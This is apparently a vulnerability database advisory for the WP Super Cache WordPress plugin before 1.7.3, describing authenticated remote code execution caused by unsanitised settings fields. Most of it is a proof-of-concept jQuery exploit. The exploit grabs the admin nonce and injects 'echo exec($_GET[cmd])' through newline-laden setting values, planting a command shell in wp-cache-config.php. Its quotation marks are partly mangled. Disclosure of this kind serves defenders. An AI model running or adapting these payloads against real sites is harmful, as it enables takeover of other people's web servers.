wpvulndbNGAWPVDB-ID:2142C3D3-9A7F-4E3C-8776-D469A355D62F
HistoryMay 14, 2021 - 12:00 a.m.

WP Super Cache < 1.7.3 - Authenticated Remote Code Execution

2021-05-1400:00:00
NGA
wpscan.com
24

0.003 Low

EPSS

Percentile

69.7%

The parameters $cache_path, $wp_cache_debug_ip, $wp_super_cache_front_page_text, $cache_scheduled_time and $cached_direct_pages, used in the plugin settings, accept "$" and "\n" in their input and therefore lead to remote code execution. This is caused by an incomplete fix for CVE-2021-24209. The injected code is then reachable at "https://target/wp-content/wp-cache-config.php".

PoC

//Exploit $cache_path url = ‘http://wp.lab/wordpress/wp-admin/options-general.php?page=wpsupercache&amp;tab;=settings’; jQuery.get(url,function(e){ jQuery.post(url,{ “action”: “scupdates”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_enabled”: 1, “wp_cache_location”: “/tmp/\n$cache_path\necho exec($_GET[cmd]);#” }) console.log(‘SET!’); }).then(()=>{ jQuery.get(url,function(e){ jQuery.post(url,{ “action”: “scupdates”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_enabled”: 1, “wp_cache_location”: “./” }) }); console.log(‘EXPLOIT!’); }); //Exploit $wp_cache_debug_ip, $wp_super_cache_front_page_text url = ‘http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab;=debug’; jQuery.get(url,function(e){ jQuery.post(url,{ “wp_cache_debug”: 1, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_debug_ip”: “/tmp/\n$wp_cache_debug_ip\necho exec($_GET[cmd]);#” //“wp_super_cache_front_page_text”: “/tmp/\n$wp_super_cache_front_page_text\necho exec($_GET[cmd]);#” }) console.log(‘SET!’); }).then(()=>{ jQuery.get(url,function(e){ jQuery.post(url,{ “wp_cache_debug”: 1, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_debug_ip”: “1” //“wp_super_cache_front_page_text”: “1” }) }); console.log(‘EXPLOIT!’); }); //Exploit $cache_scheduled_time + $cached_direct_pages url = ‘http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab;=settings’; jQuery.get(url,function(e){ jQuery.post(url,{ “action”: “scupdates”, “wp_cache_enabled”: “1”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1] }) console.log(‘SET1!’); }).then(()=>{ jQuery.get(url,function(e){ jQuery.post(url,{ “action”:“expirytime”, “cache_scheduled_time”: “\n:00", "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1], "new_direct_page":";echo$_GET[cmd];#” }) }).then(()=>{ console.log(‘EXPLOIT!’); jQuery.get(url,function(e){ jQuery.post(url,{ “action”:“expirytime”, “cache_scheduled_time”: “00:00”, “_wpnonce”: 
e.match(/_wpnonce"\svalue="(.+?)"/)[1], “new_direct_page”:“;echo$_GET[cmd]`;#” }) }) }); console.log(‘SET2!’); });

CPE Name | Operator | Version
wp-super-cache | lt | 1.7.3

